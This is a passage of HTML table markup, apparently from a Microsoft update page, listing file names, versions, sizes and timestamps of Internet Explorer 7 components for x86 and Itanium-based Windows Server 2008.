class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">1,177,600</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">1,178,624</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">671,232</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">671,232</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:25</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">19,456</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:06</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">19,456</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:23</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">27,648</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">834,048</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">27,648</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">842,240</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">19-Sep-2013</td><td class=\"sbody-td\">12:21</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">380,928</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">24-May-2013</td><td class=\"sbody-td\">17:09</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">380,928</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">498,688</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">19-Sep-2013</td><td class=\"sbody-td\">12:26</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">498,688</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:25</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">09-Sep-2011</td><td class=\"sbody-td\">11:34</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.18945</td><td class=\"sbody-td\">389,632</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">20:13</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.23226</td><td class=\"sbody-td\">390,144</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">13:24</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">479,744</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">480,256</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:25</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">3,625,984</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">1,383,424</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">20:01</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">3,627,008</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:25</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">1,383,424</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">13:04</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">271,872</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6002.18945</td><td class=\"sbody-td\">129,024</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">272,384</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6002.23226</td><td class=\"sbody-td\">129,024</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">766,976</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">766,976</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">106,496</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">106,496</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iebrshim.dll</td><td class=\"sbody-td\">6.0.6002.18945</td><td class=\"sbody-td\">53,760</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iebrshim.dll</td><td class=\"sbody-td\">6.0.6002.23226</td><td class=\"sbody-td\">53,760</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">6,119,424</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">180,736</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">6,120,960</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">180,736</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieuser.exe</td><td class=\"sbody-td\">6.0.6002.18945</td><td class=\"sbody-td\">304,128</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">20:01</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieuser.exe</td><td class=\"sbody-td\">6.0.6002.23226</td><td class=\"sbody-td\">304,128</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">13:05</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 7 on all supported Itanium-based versions of Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">2,615,296</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">22:55</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">2,616,320</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:02</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">2,234,368</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">22:53</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">2,234,368</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:00</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">62,464</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">22:52</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">62,464</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">13:58</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">81,920</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">22:53</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">1,924,096</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">22:55</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">181,760</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">22:55</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">81,920</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">13:59</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">1,940,992</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:02</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">181,760</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:02</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">18-Jun-2009</td><td class=\"sbody-td\">06:57</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">1,074,688</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">22:53</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">15-Mar-2011</td><td class=\"sbody-td\">05:10</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">1,074,688</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">13:59</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">460,800</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">22:53</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">461,312</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">13:59</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">1,045,504</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">22:53</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">03-Apr-2009</td><td class=\"sbody-td\">21:19</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">1,045,504</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:00</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">15-Mar-2011</td><td class=\"sbody-td\">05:41</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.18945</td><td class=\"sbody-td\">965,632</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:34</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.23226</td><td class=\"sbody-td\">965,632</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">13:18</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">1,532,416</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">22:53</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">1,532,928</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:00</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">10,156,544</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">22:53</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">1,383,424</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:00</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">10,158,080</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:00</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">1,383,424</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">12:53</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">564,736</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">22:53</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6002.18945</td><td class=\"sbody-td\">409,088</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">22:55</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">564,736</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">13:59</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6002.23226</td><td class=\"sbody-td\">409,088</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:02</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">2,192,896</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">22:55</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">2,192,896</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:02</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">130,048</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">22:55</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">130,048</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:02</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iebrshim.dll</td><td class=\"sbody-td\">6.0.6002.18945</td><td class=\"sbody-td\">210,432</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">22:53</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iebrshim.dll</td><td class=\"sbody-td\">6.0.6002.23226</td><td class=\"sbody-td\">210,432</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">13:59</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">11,790,848</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">22:53</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">532,992</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">22:53</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">11,794,944</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">13:59</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">532,992</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">13:59</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieuser.exe</td><td class=\"sbody-td\">6.0.6002.18945</td><td class=\"sbody-td\">476,672</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:01</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieuser.exe</td><td class=\"sbody-td\">6.0.6002.23226</td><td class=\"sbody-td\">476,672</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">12:54</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">1,177,600</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">1,178,624</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">671,232</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">671,232</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:25</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">19,456</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:06</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">19,456</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:23</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">27,648</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">834,048</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">27,648</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">842,240</td><td class=\"sbody-td\">24-Sep-2013</td><td 